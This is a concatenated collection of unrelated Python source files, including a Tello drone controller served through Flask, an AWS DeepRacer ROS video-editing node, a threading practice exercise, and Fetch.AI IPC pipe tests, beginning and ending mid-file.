self.conn.connect((HOST, PORT))
self.conn.sendall(self.name.encode())
            sleep(0.01)  # A mild delay for a non-mangled receive
self.conn.sendall(str(self.start).encode())
self.channel = Channel(self.conn)
Thread(target=self.listen_from_server, daemon=True).start()
except ConnectionRefusedError:
print("Looks like the server is down :(")
exit()
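# Usage sketch (not part of the original module; assumes a gupshup server listening
# on HOST:PORT and the Message/Channel helpers imported above):
#     client = Client("alice")
#     client.start_connection()        # connects and spawns the listener thread
#     client.send(Message(...))        # deliver a message to the server
#     incoming = client.queue.get()    # messages pushed by listen_from_server()
#     client.save_chats(); client.close_connection()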
|
index.py
|
from flask import Flask
import time
import socket
import threading
import traceback
app = Flask(__name__)
class Tello:
"""Wrapper to simply interactions with the Ryze Tello drone."""
def __init__(self, local_ip, local_port, imperial=True, command_timeout=10, tello_ip='192.168.10.1', tello_port=8889):
"""Binds to the local IP/port and puts the Tello into command mode.
Args:
local_ip (str): Local IP address to bind.
local_port (int): Local port to bind.
imperial (bool): If True, speed is MPH and distance is feet.
If False, speed is KPH and distance is meters.
command_timeout (int|float): Number of seconds to wait for a response to a command.
tello_ip (str): Tello IP.
tello_port (int): Tello port.
Raises:
RuntimeError: If the Tello rejects the attempt to enter command mode.
"""
self.abort_flag = False
self.command_timeout = command_timeout
self.imperial = imperial
self.response = None
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.tello_address = (tello_ip, tello_port)
self.socket.bind((local_ip, local_port))
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon=True
self.receive_thread.start()
if self.send_command('command') != 'ok':
raise RuntimeError('Tello rejected attempt to enter command mode')
print(" *** Tello Initialised")
def __del__(self):
"""Closes the local socket."""
self.socket.close()
def _receive_thread(self):
"""Listens for responses from the Tello.
Runs as a thread, sets self.response to whatever the Tello last returned.
"""
while True:
try:
self.response, ip = self.socket.recvfrom(256)
except Exception:
break
def flip(self, direction):
"""Flips.
Args:
direction (str): Direction to flip, 'l', 'r', 'f', 'b', 'lb', 'lf', 'rb' or 'rf'.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('flip %s' % direction)
def get_battery(self):
"""Returns percent battery life remaining.
Returns:
int: Percent battery life remaining.
"""
battery = self.send_command('battery?')
try:
battery = int(battery)
        except ValueError:
            # keep the raw response if it isn't a plain integer
            pass
return battery
def get_flight_time(self):
"""Returns the number of seconds elapsed during flight.
Returns:
int: Seconds elapsed during flight.
"""
flight_time = self.send_command('time?')
try:
flight_time = int(flight_time)
        except ValueError:
            pass
return flight_time
def get_speed(self):
"""Returns the current speed.
Returns:
int: Current speed in KPH or MPH.
"""
speed = self.send_command('speed?')
try:
speed = float(speed)
if self.imperial is True:
speed = round((speed / 44.704), 1)
else:
speed = round((speed / 27.7778), 1)
        except ValueError:
            pass
return speed
def land(self):
"""Initiates landing.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('land')
def move(self, direction, distance):
"""Moves in a direction for a distance.
This method expects meters or feet. The Tello API expects distances
from 20 to 500 centimeters.
Metric: .1 to 5 meters
Imperial: .7 to 16.4 feet
Args:
direction (str): Direction to move, 'forward', 'back', 'right' or 'left'.
distance (int|float): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
distance = float(distance)
if self.imperial is True:
distance = int(round(distance * 30.48))
else:
distance = int(round(distance * 100))
return self.send_command('%s %s' % (direction, distance))
def move_backward(self, distance):
"""Moves backward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('back', distance)
def move_down(self, distance):
"""Moves down for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('down', distance)
def move_forward(self, distance):
"""Moves forward for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('forward', distance)
def move_left(self, distance):
"""Moves left for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('left', distance)
def move_right(self, distance):
"""Moves right for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
"""
return self.move('right', distance)
def move_up(self, distance):
"""Moves up for a distance.
See comments for Tello.move().
Args:
distance (int): Distance to move.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.move('up', distance)
def send_command(self, command):
"""Sends a command to the Tello and waits for a response.
If self.command_timeout is exceeded before a response is received,
a RuntimeError exception is raised.
Args:
command (str): Command to send.
Returns:
str: Response from Tello.
Raises:
RuntimeError: If no response is received within self.timeout seconds.
"""
self.abort_flag = False
timer = threading.Timer(self.command_timeout, self.set_abort_flag)
self.socket.sendto(command.encode('utf-8'), self.tello_address)
timer.start()
while self.response is None:
if self.abort_flag is True:
raise RuntimeError('No response to command')
timer.cancel()
response = self.response.decode('utf-8')
self.response = None
return response
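    # Illustration (not part of the original source): the Tello text protocol is
    # request/response; send_command('battery?') typically returns a numeric string
    # such as '87', while action commands like 'takeoff' return 'ok' (or an error
    # string) once the drone acknowledges them.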
def set_abort_flag(self):
"""Sets self.abort_flag to True.
        Used by the timer in Tello.send_command() to indicate that a response
timeout has occurred.
"""
self.abort_flag = True
def set_speed(self, speed):
"""Sets speed.
This method expects KPH or MPH. The Tello API expects speeds from
1 to 100 centimeters/second.
Metric: .1 to 3.6 KPH
Imperial: .1 to 2.2 MPH
Args:
speed (int|float): Speed.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
speed = float(speed)
if self.imperial is True:
speed = int(round(speed * 44.704))
else:
speed = int(round(speed * 27.7778))
return self.send_command('speed %s' % speed)
def takeoff(self):
"""Initiates take-off.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
print(" *** Sending Takeoff command")
return self.send_command('takeoff')
def rotate_cw(self, degrees):
"""Rotates clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('cw %s' % degrees)
def rotate_ccw(self, degrees):
"""Rotates counter-clockwise.
Args:
degrees (int): Degrees to rotate, 1 to 360.
Returns:
str: Response from Tello, 'OK' or 'FALSE'.
"""
return self.send_command('ccw %s' % degrees)
drone = Tello('192.168.10.3', 8889)
@app.route("/launch")
def launch():
print("Launching Drone")
#drone1 = Tello('192.168.10.3', 8889)
drone.takeoff()
drone.land()
return "Launching drone."
@app.route("/land")
def land():
print("Landing Drone")
#drone2 = Tello('192.168.10.3', 8889)
drone.land()
return "Landing drone."
@app.route("/")
def hello_world():
if drone is None:
print("No drone initialised")
return "Drone control on!"
|
agents_video_editor.py
|
#!/usr/bin/env python
##############################################################
# #
# Copyright 2019 Amazon.com, Inc. or its affiliates. #
# All Rights Reserved. #
# #
##############################################################
import sys
import time
import logging
from threading import Thread
import Queue
import cv2
import rospy
from std_srvs.srv import Empty
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import Image as ROSImg
from std_msgs.msg import String
from markov.utils import DoubleBuffer, force_list, get_video_display_name, get_racecar_names
from markov.constants import DEFAULT_COLOR
from markov.log_handler.logger import Logger
from markov.log_handler.exception_handler import log_and_exit
from markov.log_handler.constants import (SIMAPP_EVENT_ERROR_CODE_500,
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION)
from markov.reset.constants import (RaceType)
from markov.rospy_wrappers import ServiceProxyWrapper
from markov.utils import get_racecar_idx
from deepracer_simulation_environment.srv import VideoMetricsSrvRequest, VideoMetricsSrv
from mp4_saving.constants import (CameraTypeParams,
Mp4Parameter, FrameQueueData, MAX_FRAMES_IN_QUEUE,
KVS_PUBLISH_PERIOD, QUEUE_WAIT_TIME, FrameTypes)
from mp4_saving.single_agent_image_editing import SingleAgentImageEditing
from mp4_saving.multi_agent_image_editing import MultiAgentImageEditing
from mp4_saving.training_image_editing import TrainingImageEditing
from mp4_saving.f1_image_editing import F1ImageEditing
from mp4_saving import utils
from mp4_saving.save_to_mp4 import SaveToMp4
LOG = Logger(__name__, logging.INFO).get_logger()
class AgentsVideoEditor(object):
""" This node is used to produce frames for the AWS kinesis video stream and
for saving the mp4 and uploading to S3. Both are subscribed to the output of
the image topic produced by this node.
"""
_agents_metrics = list()
_mp4_queue = list()
def __init__(self, racecar_name, racecars_info, is_publish_to_kvs_stream):
#
        # We have no guarantee as to when gazebo will load the model, therefore we need to
        # wait until the model is loaded and the markov package has spawned all the models.
#
rospy.wait_for_service('/robomaker_markov_package_ready')
self._agents_metrics.append(DoubleBuffer(clear_data_on_get=False))
self.racecar_name = racecar_name
self.racecars_info = racecars_info
racecar_index = get_racecar_idx(racecar_name)
self.racecar_index = racecar_index if racecar_index else 0
self.agent_name = utils.racecar_name_to_agent_name(racecars_info, racecar_name)
self._is_publish_to_kvs_stream = is_publish_to_kvs_stream
# init cv bridge
self.bridge = CvBridge()
# This determines what kind of image editing should be done based on the race type
self.is_training = rospy.get_param("JOB_TYPE") == 'TRAINING'
self.race_type = rospy.get_param("RACE_TYPE", RaceType.TIME_TRIAL.value)
self.is_f1_race_type = self.race_type == RaceType.F1.value
#
        # Two job-type objects are required because the F1 editing keeps static variables used to
        # compute the gap and ranking. Because Mp4 frames are queued (and lag behind), those values
        # would already have been updated by the KVS pass; if the same object were reused, the finish
        # phase would show every racer's information at once instead of updating in real time as
        # racers finish the lap.
        # %TODO separate out the kvs and Mp4 functionality
#
self.job_type_image_edit_mp4 = self._get_image_editing_job_type()
if self.is_training:
# String indicating the current phase
self._current_training_phase = DoubleBuffer(clear_data_on_get=False)
self._current_training_phase.put('Initializing')
# Subscriber to get the phase of the training (Ideal, training, evaluation)
rospy.Subscriber('/agent/training_phase', String, self._training_phase_cb)
# Fetching main camera frames, start consumer thread and producer thread for main camera frame
main_camera_topic = "/{}/{}/zed/rgb/image_rect_color".format(self.racecar_name, "main_camera")
# All Mp4 related initialization
self._mp4_queue.append(Queue.Queue())
# Initialize save mp4 ROS service for the markov package to signal when to
# start and stop collecting video frames
camera_info = utils.get_cameratype_params(self.racecar_name, self.agent_name, self.is_f1_race_type)
self.save_to_mp4_obj = SaveToMp4(camera_infos=[camera_info[CameraTypeParams.CAMERA_PIP_PARAMS],
camera_info[CameraTypeParams.CAMERA_45DEGREE_PARAMS],
camera_info[CameraTypeParams.CAMERA_TOPVIEW_PARAMS]],
fourcc=Mp4Parameter.FOURCC.value,
fps=Mp4Parameter.FPS.value,
frame_size=Mp4Parameter.FRAME_SIZE.value)
rospy.Service('/{}/save_mp4/subscribe_to_save_mp4'.format(self.racecar_name),
Empty, self.subscribe_to_save_mp4)
rospy.Service('/{}/save_mp4/unsubscribe_from_save_mp4'.format(self.racecar_name),
Empty, self.unsubscribe_to_save_mp4)
# Publish to save mp4 topic
self.mp4_main_camera_pub = rospy.Publisher('/{}/deepracer/main_camera_stream'.format(self.racecar_name), ROSImg,
queue_size=1)
# ROS service to get video metrics
rospy.wait_for_service("/{}/{}".format(self.agent_name, "mp4_video_metrics"))
self.mp4_video_metrics_srv = ServiceProxyWrapper("/{}/{}".format(self.agent_name, "mp4_video_metrics"),
VideoMetricsSrv)
self.is_save_mp4_enabled = False
# Only F1 race requires top camera frames edited
self.top_camera_mp4_pub = None
if self.is_f1_race_type and self.racecar_index == 0:
self._top_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
top_camera_topic = "/sub_camera/zed/rgb/image_rect_color"
rospy.Subscriber(top_camera_topic, ROSImg, self._top_camera_cb)
self.top_camera_mp4_pub = rospy.Publisher('/{}/topcamera/deepracer/mp4_stream'.format(racecar_name),
ROSImg, queue_size=1)
self._main_camera_frame_buffer = DoubleBuffer(clear_data_on_get=False)
rospy.Subscriber(main_camera_topic, ROSImg, self._producer_frame_thread)
Thread(target=self._consumer_mp4_frame_thread).start()
# Leaderboard jobs do not require KVS streams
if self._is_publish_to_kvs_stream:
self.job_type_image_edit_kvs = self._get_image_editing_job_type()
# Publish to KVS stream topic
self.kvs_pub = rospy.Publisher('/{}/deepracer/kvs_stream'.format(self.racecar_name), ROSImg, queue_size=1)
Thread(target=self._kvs_publisher).start()
def subscribe_to_save_mp4(self, req):
""" Ros service handler function used to subscribe to the Image topic.
Arguments:
req (req): Dummy req else the ros service throws exception
Return:
[] - Empty list else ros service throws exception
"""
self.is_save_mp4_enabled = True
self.save_to_mp4_obj.subscribe_to_save_mp4()
return []
def unsubscribe_to_save_mp4(self, req):
""" Ros service handler function used to unsubscribe from the Image topic.
This will take care of cleaning and releasing the cv2 VideoWriter
Arguments:
req (req): Dummy req else the ros service throws exception
Return:
[] - Empty list else ros service throws exception
"""
self.is_save_mp4_enabled = False
        # This is required because, when the unsubscribe call is made, frames already in the queue
        # continue to be edited; during that time the 45degree camera would otherwise stay subscribed
        # and keep being saved to mp4, which we do not want.
camera_topics_stop_immediately, camera_topics_stop_post_empty_queue = list(), list()
if not self.top_camera_mp4_pub:
camera_topics_stop_immediately = [CameraTypeParams.CAMERA_45DEGREE_PARAMS.value,
CameraTypeParams.CAMERA_TOPVIEW_PARAMS.value]
camera_topics_stop_post_empty_queue = [CameraTypeParams.CAMERA_PIP_PARAMS.value]
else:
camera_topics_stop_immediately = [CameraTypeParams.CAMERA_45DEGREE_PARAMS.value]
camera_topics_stop_post_empty_queue = [CameraTypeParams.CAMERA_TOPVIEW_PARAMS.value,
CameraTypeParams.CAMERA_PIP_PARAMS.value]
self.save_to_mp4_obj.unsubscribe_to_save_mp4(camera_topics_stop_immediately)
LOG.info("Waiting to flush the Mp4 queue for racecar_{}...".format(self.racecar_index))
while not self._mp4_queue[self.racecar_index].empty():
time.sleep(1)
LOG.info("Done flushing the Mp4 queue for racecar_{}...".format(self.racecar_index))
self.save_to_mp4_obj.unsubscribe_to_save_mp4(camera_topics_stop_post_empty_queue)
return []
def _top_camera_cb(self, frame):
        '''Callback for the frames being published by the top camera topic
frame - Frames, of type Image, being published by main camera topic
'''
self._top_camera_frame_buffer.put(frame)
def _training_phase_cb(self, phase):
""" Callback function that gives the training phase - Whether its in
evaluation, ideal, training, initializing
Args:
phase: [description]
"""
self._current_training_phase.put(phase.data)
def _get_image_editing_job_type(self):
""" This determines what kinding of image editing should be done based on the race type
Returns:
ImageEditingObj: Instantiating an object based on training/evaluation and racetype
"""
if self.is_training:
return TrainingImageEditing(self.racecar_name, self.racecars_info, self.race_type)
elif self.is_f1_race_type:
return F1ImageEditing(self.racecar_name, self.racecars_info, self.race_type)
elif self.race_type == RaceType.HEAD_TO_MODEL.value:
return MultiAgentImageEditing(self.racecar_name, self.racecars_info,
self.race_type)
elif self.race_type in [RaceType.TIME_TRIAL.value, RaceType.OBJECT_AVOIDANCE.value,
RaceType.HEAD_TO_BOT.value]:
return SingleAgentImageEditing(self.racecar_name, self.racecars_info, self.race_type)
raise Exception("Unknown job type for image editing")
def _update_racers_metrics(self):
""" Used to update the racers metric information
"""
if not rospy.is_shutdown():
video_metrics = self.mp4_video_metrics_srv(VideoMetricsSrvRequest())
self._agents_metrics[self.racecar_index].put(video_metrics)
def _edit_main_camera_images(self, frame_data, metric_info, is_mp4, edited_frame_result):
""" Thread to edit main camera frames
Args:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
metric_info (dict): This contains metric information to edit the videos also the phase like training phase
is_mp4 (bool): Is this editing part of KVS or MP4
edited_frame_result (dict): A mutable variable holding the dict result of edited frame
"""
main_frame = frame_data[FrameQueueData.FRAME.value][FrameTypes.MAIN_CAMERA_FRAME.value]
major_cv_image = self.bridge.imgmsg_to_cv2(main_frame, "bgr8")
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
# Edit the image based on the racecar type and job type
if is_mp4:
major_cv_image = self.job_type_image_edit_mp4.edit_image(major_cv_image, metric_info)
else:
major_cv_image = self.job_type_image_edit_kvs.edit_image(major_cv_image, metric_info)
edited_main_frame = self.bridge.cv2_to_imgmsg(major_cv_image, "bgr8")
edited_frame_result[FrameTypes.MAIN_CAMERA_FRAME.value] = edited_main_frame
def _edit_top_camera_images(self, frame_data, metric_info, edited_frame_result):
""" Thread to edit top camera frames. This is only for the F1 format
Args:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
metric_info (dict): This contains metric information to edit the videos also the phase like training phase
edited_frame_result (dict): A mutable variable holding the dict result of edited frame
"""
top_camera_frame = frame_data[FrameQueueData.FRAME.value][FrameTypes.TOP_CAMERA_FRAME.value]
top_cv_image = self.bridge.imgmsg_to_cv2(top_camera_frame, "bgr8")
top_cv_image = cv2.cvtColor(top_cv_image, cv2.COLOR_RGB2RGBA)
top_cv_image = self.job_type_image_edit_mp4.edit_top_camera_image(top_cv_image, metric_info)
edited_top_frame = self.bridge.cv2_to_imgmsg(top_cv_image, "bgr8")
edited_frame_result[FrameTypes.TOP_CAMERA_FRAME.value] = edited_top_frame
def _edit_camera_images(self, frame_data, is_mp4):
""" Edit camera image by calling respective job type
Arguments:
frame_data (dict): Dictionary of frame, agent_metric_info, training_phase
is_mp4 (bool): Is this edit camera image for kvs or mp4
Returns:
Image: Edited image
"""
metric_info = {
FrameQueueData.AGENT_METRIC_INFO.value: frame_data[FrameQueueData.AGENT_METRIC_INFO.value],
FrameQueueData.TRAINING_PHASE.value: frame_data[FrameQueueData.TRAINING_PHASE.value]
}
# convert ros image message to cv image
try:
edited_frame_result = dict()
self._edit_main_camera_images(frame_data, metric_info, is_mp4, edited_frame_result)
# Edit top camera image only if its F1
edited_frame_result[FrameTypes.TOP_CAMERA_FRAME.value] = None
if self.top_camera_mp4_pub and is_mp4:
self._edit_top_camera_images(frame_data, metric_info, edited_frame_result)
return edited_frame_result
except CvBridgeError as ex:
LOG.info("cv2 to ROS image message error: {}".format(ex))
def get_latest_frame_metric_data(self):
""" Get the latest frame, metric information, training phase data from the double buffer.
Returns:
queue_data (dict): Contains information of the frame, agent_metric_info, training_phase
"""
agent_metric_info = [metrics.get() for metrics in self._agents_metrics]
queue_data = {
FrameQueueData.FRAME.value: {
FrameTypes.MAIN_CAMERA_FRAME.value: self._main_camera_frame_buffer.get(),
FrameTypes.TOP_CAMERA_FRAME.value: (self._top_camera_frame_buffer.get()
if self.top_camera_mp4_pub else [])
},
FrameQueueData.AGENT_METRIC_INFO.value: agent_metric_info,
FrameQueueData.TRAINING_PHASE.value: self._current_training_phase.get() if self.is_training else ''
}
return queue_data
def _producer_frame_thread(self, frame):
""" Callback for the main camera frame. Once a new image is received, all the required
service calls are made to get the video metric information. Then for MP4 it is put into a queue,
but for KVS it is put into a double buffer, since we only care about the latest image for KVS.
Arguments:
frame (cv2.ImgMsg): Image/Sensor topic of the camera image frame
"""
if not rospy.is_shutdown():
if len(self.racecars_info) != len(self._mp4_queue):
pass
self._update_racers_metrics()
self._main_camera_frame_buffer.put(frame)
# Get frame from main camera & agents metric information
frame_metric_data = self.get_latest_frame_metric_data()
if self.is_save_mp4_enabled:
if self._mp4_queue[self.racecar_index].qsize() == MAX_FRAMES_IN_QUEUE:
LOG.info("Dropping Mp4 frame from the queue")
self._mp4_queue[self.racecar_index].get()
# Append to the MP4 queue
self._mp4_queue[self.racecar_index].put(frame_metric_data)
def _consumer_mp4_frame_thread(self):
""" Consumes the frame produced by the _producer_frame_thread and edits the image
The edited image is put into another queue for publishing to MP4 topic
"""
while not rospy.is_shutdown():
frame_data = None
try:
# Pop from the queue and edit the image
frame_data = self._mp4_queue[self.racecar_index].get(timeout=QUEUE_WAIT_TIME)
except Queue.Empty:
LOG.debug("AgentsVideoEditor._mp4_queue['{}'] is empty. Retrying...".format(self.racecar_index))
if frame_data:
edited_frames = self._edit_camera_images(frame_data, is_mp4=True)
self.mp4_main_camera_pub.publish(edited_frames[FrameTypes.MAIN_CAMERA_FRAME.value])
if self.top_camera_mp4_pub:
self.top_camera_mp4_pub.publish(edited_frames[FrameTypes.TOP_CAMERA_FRAME.value])
def _kvs_publisher(self):
""" Publishing the latest edited image to KVS topic at 15 FPS real time.
In case of Kinesis video stream we want to publish frames real time at 15 FPS. If the frames
are not published at this rate, there will be jitter and video will be laggy. So it has to always
be the real time. Unlike mp4_publisher this cannot be a simulation time.
"""
try:
prev_time = time.time()
while not rospy.is_shutdown():
frame_metric_data = self.get_latest_frame_metric_data()
edited_frames = self._edit_camera_images(frame_metric_data, is_mp4=False)
if not rospy.is_shutdown():
self.kvs_pub.publish(edited_frames[FrameTypes.MAIN_CAMERA_FRAME.value])
cur_time = time.time()
time_diff = cur_time - prev_time
time.sleep(max(KVS_PUBLISH_PERIOD - time_diff, 0))
prev_time = time.time()
except (rospy.ROSInterruptException, rospy.ROSException):
pass
def get_racecars_info(racecar_names):
""" This function returns the agents information like name, car color, display name
Arguments:
racecar_names (list): comma separated racecar names
Returns:
(list): Racecar information such as name, car color, display name
"""
racecars = racecar_names
racecars_info = list()
racecars_color = force_list(rospy.get_param("CAR_COLOR",
[DEFAULT_COLOR] * len(racecar_names)))
racecars_display_name = get_video_display_name()
for i, racecar_name in enumerate(racecars):
racecar_dict = dict()
racecar_dict['name'] = racecar_name
racecar_dict['racecar_color'] = racecars_color[i]
racecar_dict['display_name'] = racecars_display_name[i]
racecars_info.append(racecar_dict)
return racecars_info
def main(racecar_names, is_publish_to_kvs_stream):
""" Main function for kinesis_video_camera
Arguments:
racecar_names (list): racecar names as a comma separated string
"""
try:
racecars_info = get_racecars_info(racecar_names)
for racecar in racecars_info:
# Instantiate AgentCameraVideoEditor objects for each racecar
AgentsVideoEditor(racecar['name'], racecars_info, is_publish_to_kvs_stream)
except Exception as err_msg:
log_and_exit("Exception in Kinesis Video camera ros node: {}".format(err_msg),
SIMAPP_SIMULATION_KINESIS_VIDEO_CAMERA_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500)
if __name__ == '__main__':
# comma separated racecar names passed as an argument to the node
rospy.init_node('agent_camera_video_editor_node', anonymous=True)
RACER_NUM = int(sys.argv[1])
RACECAR_NAMES = get_racecar_names(RACER_NUM)
PUBLISH_TO_KVS_STREAM = False if sys.argv[2] == "False" else True
LOG.info("Publishing to KVS stream is enabled: {}".format(str(PUBLISH_TO_KVS_STREAM)))
main(RACECAR_NAMES, PUBLISH_TO_KVS_STREAM)
rospy.spin()
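# --- Illustrative sketch (not part of the original node) ---
# The producer/consumer docstrings above describe a drop-oldest bounded queue for
# MP4 frames: when the queue is full, the oldest frame is discarded so the
# producer never blocks. A minimal, standalone version of that pattern is shown
# below; the names (_drop_oldest_demo, max_frames) are illustrative only.
def _drop_oldest_demo(max_frames=5, num_items=20):
    import queue
    import threading
    import time

    frame_queue = queue.Queue()

    def producer():
        for i in range(num_items):
            if frame_queue.qsize() >= max_frames:
                try:
                    frame_queue.get_nowait()  # drop the oldest item instead of blocking
                except queue.Empty:
                    pass
            frame_queue.put(i)  # enqueue the newest item
            time.sleep(0.001)

    def consumer(results):
        while True:
            try:
                results.append(frame_queue.get(timeout=0.5))
            except queue.Empty:
                break  # producer is done and the queue has drained

    results = []
    threads = [threading.Thread(target=producer),
               threading.Thread(target=consumer, args=(results,))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results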
|
asynchronous.py
|
# Practice Activity: Asynchronous Programming
#
# Continue from the previous practice activity.
# Change your code to use async functions instead of threads.
# Create an event loop just as we did in the video --
# you will just need to change the function body itself.
# (A possible solution is sketched after the threaded code below.)
#
# Note: When you are doing async functions,
# you cannot use time.sleep(1).
# Instead, you should use: await asyncio.sleep(1)
import time
import threading
balance = 10000
lock = threading.Lock()
def withdrawl():
global balance, lock
with lock:
v = balance
if v >= 10:
time.sleep(0.001)
v = v - 10
balance = v
return
if __name__ == "__main__":
thread_list = []
for i in range(1100):
t = threading.Thread(target=withdrawl)
thread_list.append(t)
t.start()
for i in thread_list:
i.join()
print("Balance: {}".format(balance))
|
status_report.py
|
# import os
# import sys
# from ctypes import c_char
# from io import StringIO
# from multiprocessing import Process, Manager, Value, Array
# from subprocess import Popen, PIPE
# from time import sleep
#
#
# class StatusStdOut(StringIO):
# def __init__(self, stdout):
# self.stdout = stdout
#
# def write(self, s):
# self.stdout += s
#
#
# class StatusStruct(object):
# def __init__(self, process):
# self.status = ""
# self.process = process
#
#
# class StatusProcess(Process):
# def __init__(self, *args, **kwargs):
# self.stdout = Manager().list("")
# kwargs["kwargs"]["stdout"] = self.stdout
# super(StatusProcess, self).__init__(*args, **kwargs)
#
# def __str__(self):
# return "".join(self.stdout)
#
# LIMPAR_ATE_O_FIM_DA_LINHA = '\x1b[K'  # (Portuguese: "clear to the end of the line")
# class StatusReport(object):
# processes = {}
#
# @staticmethod
# def run(name, cmd, *args, **kwargs):
# # sys.stdout = StatusStdOut()
# # try:
# # while p.poll() is None:
# # if verbose and p.stdout is not None:
# # print(p.stdout.readline().decode(), end="")
# # print(p.stderr.readline().decode(), end="")
# p = StatusProcess(target=StatusReport._parallel_run, args=(cmd,) + args, kwargs=kwargs)
# p.start()
# StatusReport.processes[name] = p
# while p.is_alive():
# # os.system("clear")
# info = str(p).split("\n")[-6:]
# if info:
# # print(info)
# for i in info:
# print(i)
# os.system("tput el")
# os.system("tput cuu %d" % len(info))
# sleep(0.1)
# p.join()
# # sys.stdout = sys.__stdout__
#
# @staticmethod
# def _parallel_run(cmd, *args, verbose=True, folder=None, stdout=None, **kwargs):
# sys.stdout = StatusStdOut(stdout)
# if folder:
# os.chdir(folder)
# try:
# if isinstance(cmd, str):
# p = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
# while p.poll():
# if verbose:
# print(p.stdout.readline().decode(), end="")
# print(p.stderr.readline().decode(), end="")
# if verbose:
# line = p.stdout.readline()
# while line:
# print(line.decode(), end="")
# line = p.stdout.readline()
# # [print(l.decode(), end="") for l in p.stdout.readlines()]
# # [print(l.decode(), end="") for l in p.stderr.readlines()]
#
# return p.poll()
# if callable(cmd):
# print("call")
#
# except KeyboardInterrupt:
# pass
# finally:
# sys.stdout = sys.__stdout__
#
# @staticmethod
# def print_report():
# pass
|
test_pipe.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""Tests for the pipe module."""
import asyncio
from threading import Thread
import pytest
from aea.helpers.pipe import (
IPCChannelClient,
PosixNamedPipeChannel,
PosixNamedPipeChannelClient,
TCPSocketChannel,
TCPSocketChannelClient,
make_ipc_channel,
make_ipc_channel_client,
)
from tests.conftest import skip_test_windows
def _run_echo_service(client: IPCChannelClient):
async def echo_service(client: IPCChannelClient):
try:
await client.connect()
while True:
data = await client.read()
if not data:
break
await client.write(data)
except (asyncio.IncompleteReadError, asyncio.CancelledError, OSError):
pass
finally:
await client.close()
loop = asyncio.new_event_loop()
loop.run_until_complete(echo_service(client))
@pytest.mark.asyncio
class TestAEAHelperMakePipe:
"""Test that make_ipc_channel utility and abstract class IPCChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = make_ipc_channel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "Pipe not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = make_ipc_channel_client(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
@pytest.mark.asyncio
class TestAEAHelperTCPSocketChannel:
"""Test that TCPSocketChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = TCPSocketChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "TCPSocketChannel not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = TCPSocketChannelClient(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
@pytest.mark.asyncio
async def test_connection_refused(self):
"""Test connection refused."""
pipe = TCPSocketChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "TCPSocketChannel not properly setup"
client_pipe = TCPSocketChannelClient(pipe.out_path, pipe.in_path)
connected = await client_pipe.connect()
assert connected is False
@skip_test_windows
@pytest.mark.asyncio
class TestAEAHelperPosixNamedPipeChannel:
"""Test that TCPSocketChannel work properly"""
@pytest.mark.asyncio
async def test_connection_communication(self):
"""Test connection communication."""
pipe = PosixNamedPipeChannel()
assert (
pipe.in_path is not None and pipe.out_path is not None
), "PosixNamedPipeChannel not properly setup"
connected = asyncio.ensure_future(pipe.connect())
client_pipe = PosixNamedPipeChannelClient(pipe.out_path, pipe.in_path)
client = Thread(target=_run_echo_service, args=[client_pipe])
client.start()
try:
assert await connected, "Failed to connect pipe"
message = b"hello"
await pipe.write(message)
received = await pipe.read()
assert received == message, "Echoed message differs"
except Exception:
raise
finally:
await pipe.close()
client.join()
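# --- Illustrative sketch (not part of the original test module) ---
# A condensed, non-pytest version of the round trip the tests above exercise:
# create a server-side channel with make_ipc_channel(), run the echo client from
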